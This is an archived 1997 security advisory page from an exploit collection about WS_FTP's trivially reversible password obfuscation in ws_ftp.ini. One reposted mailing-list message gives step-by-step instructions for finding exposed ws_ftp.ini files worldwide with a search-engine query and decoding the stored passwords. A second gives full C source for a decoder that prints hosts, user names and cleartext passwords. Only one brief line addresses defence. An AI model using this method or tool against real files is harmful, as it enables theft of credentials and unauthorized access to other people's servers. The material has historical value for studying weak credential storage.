Trivial "encryption" (obfuscation) in ws_ftp.ini
| Description: | WS_FTP offers the facility for morons to store their ftp password to remote systems. It keeps this information in ws_ftp.ini in obfuscated form which is easy to decode. Additionally, some idiots have their ws_ftp.ini (including passwords) available on public internet ftp sites. |
| Author: | Milosch Meriac <anotherPI@studbox.uni-stuttgart.de> |
| Compromise: | Obtain cleartext passwors from ws_ftp.ini files |
| Vulnerable Systems: | People who save passwords w/ws_ftp and keep the .ini file where it is accessible to others. |
| Date: | 9 August 1997 |
| Notes: | I have appended a simple program to "decrypt" the ini file. |
Date: Sat, 09 Aug 1997 12:59:27 +0200
From: Milosch Meriac <anotherPI@studbox.uni-stuttgart.de>
To: best-of-security@cyber.com.au
Subject: BoS: WS_FTP.INI Security hole.
hi,
i have discovered the following bug/security hole:
Step 1.: find some WS_FTP.INI files Worldwide using
http://ftpsearch.ntnu.no/ftpsearch?query=ws_ftp.ini&doit=Search&type=Case+in
sensitive+substring+search&hits=5000&matches=&hitsprmatch=&limdom=&limpath=&
f1=Count&f2=Mode&f3=Size&f4=Date&f5=Host&f6=Path&header=none&sort=date&trlen
=20
(sorted by Date & Size)
Step 2.: approximately 30% if these Files are containing encrypted
Passords for WWW/FTP servers plus Usernames & Hosts;
---->75% of these Passwords are valid !!!
example: Content of a WS_FTP.INI-file:
[Gate]
HOST=ftp.gate.net
UID=ftp
PWD=616F71717D727B7A48
LOCDIR=D:\
DIR=/
(PWD=<encrypted Password stands here>)
Step 3.: decrypt Passwords:
The Encryption Method used in WS_FTP is _extremely_ weak ! the Password
is converted (ASCII conforming) to Hex-Numbers (2 Digits)... if a Digit
is at position N , then N is added to this Digit ---> thats all !
(The passwort mentioned in the above example is anonymus@)
How To Check if you are vulerable:
Scan your whole Website for the File "WS_FTP.INI" and ensure that this
File ist Locked for all Users expect of the Owner !
Seldom this also works with
- EUDORA.INI
- PMAIL.INI (Pegasus Mail)
- prefs.js (Netscape)
- other INI/etc.-files (andere INI/etc.-Dateien)
_All_ files/programs mentioned above have _extremely_weak_ encryption-schemes
schemes... please check your Website !
-milosch meriac
---------
HomePage: http://wwwcip.rus.uni-stuttgart.de/~tky20848/
PGP: http://wwwcip.rus.uni-stuttgart.de/~tky20848/PGP/anotherpi.key
Date: Mon, 11 Aug 1997 06:02:13 +0700
From: JeBe <jebe@STUDENTS.ITB.AC.ID>
To: BUGTRAQ@NETSPACE.ORG
Subject: Program To decrypt password in ws_ftp.ini
/* This Program is freely distributed as long you not removed
this comment.
It's used to decrypt password on ini file, specially on ws_ftp.ini
Written by
JeBe Budianto, Electricall Engineering ITB
E-Mail: jebe@students.itb.ac.id
jebe@EE.ITB.ac.id
Tested on FreeBSD 2.1.5
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char password[100];
void extract(void)
{
int h,i,j,k,l;
char m[2],n[2];
char ch;
i=4;h=0;
m[1]=0;
n[1]=0;
if(password[i]=='V') i=5;
while((password[i] != '\r'))
{
if(password[i]=='\n')
{ printf("\n");
exit(0);
}
m[0]=password[i];i++;
n[0]=password[i];i++;
if(isdigit(m[0]))
{ k=atoi(m);
}
else
{ ch=tolower(m[0]);
switch(ch)
{ case 'a' : k=10;break;
case 'b' : k=11;break;
case 'c' : k=12;break;
case 'd' : k=13;break;
case 'e' : k=14;break;
case 'f' : k=15;
}
}
if(isdigit(n[0]))
{ l=atoi(n);
}
else
{ ch=tolower(n[0]);
switch(ch)
{ case 'a' : l=10;break;
case 'b' : l=11;break;
case 'c' : l=12;break;
case 'd' : l=13;break;
case 'e' : l=14;break;
case 'f' : l=15;
}
}
k=(k*16)+l-h;
h++;
printf("%c",k);
}
printf("\n");
}
void main(int argc,char **argv)
{ FILE *fp;
char *sp;
int counter,complete;
char buff01[100],host[100],nama[100],namafile[100];
printf("==============================================\n");
printf("| Syntax: ProgramName IniFileName |\n");
printf("| Written by jebe@students.itb.ac.id |\n");
printf("==============================================\n");
if(argc==1)
{ printf("Use default ini file WS_FTP.INI\n");
strcpy(namafile,"WS_FTP.INI");
}
else
{ strcpy(namafile,argv[1]);
}
fp=fopen(namafile,"r");
if(fp==NULL)
{ printf("There's no ini file\n");
exit(0);
}
sp=fgets(buff01,sizeof(buff01),fp);
counter=1;
while(sp != NULL)
{
if((buff01[0]=='H' && buff01[1]=='O' && buff01[2]=='S' && buff01[3]=='T'))
{ strcpy(host,buff01);
complete=1;
}
if((buff01[0]=='U' && buff01[1]=='I' && buff01[2]=='D'))
{ strcpy(nama,buff01);
complete++;
}
if((buff01[0]=='P' && buff01[1]=='W' && buff01[2]=='D'))
{ strcpy(password,buff01);
complete++;
}
if(complete==3)
{ if(( nama[4]=='f' && nama[5]=='t' && nama[6]=='p') || (nama[4]=='a' && nama[5]=='n' && nama[6]=='o' && nama[7]=='n' && nama[8]=='y' && nama[9]=='m' && nama[10]=='o' && nama[11]=='u' && nama[12]=='s'))
{}
else
{ printf("%s",host);
printf("%s",nama);
printf("Password = ");
extract();
}
}
sp=fgets(buff01,sizeof(buff01),fp);
}
fclose(fp);
}
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
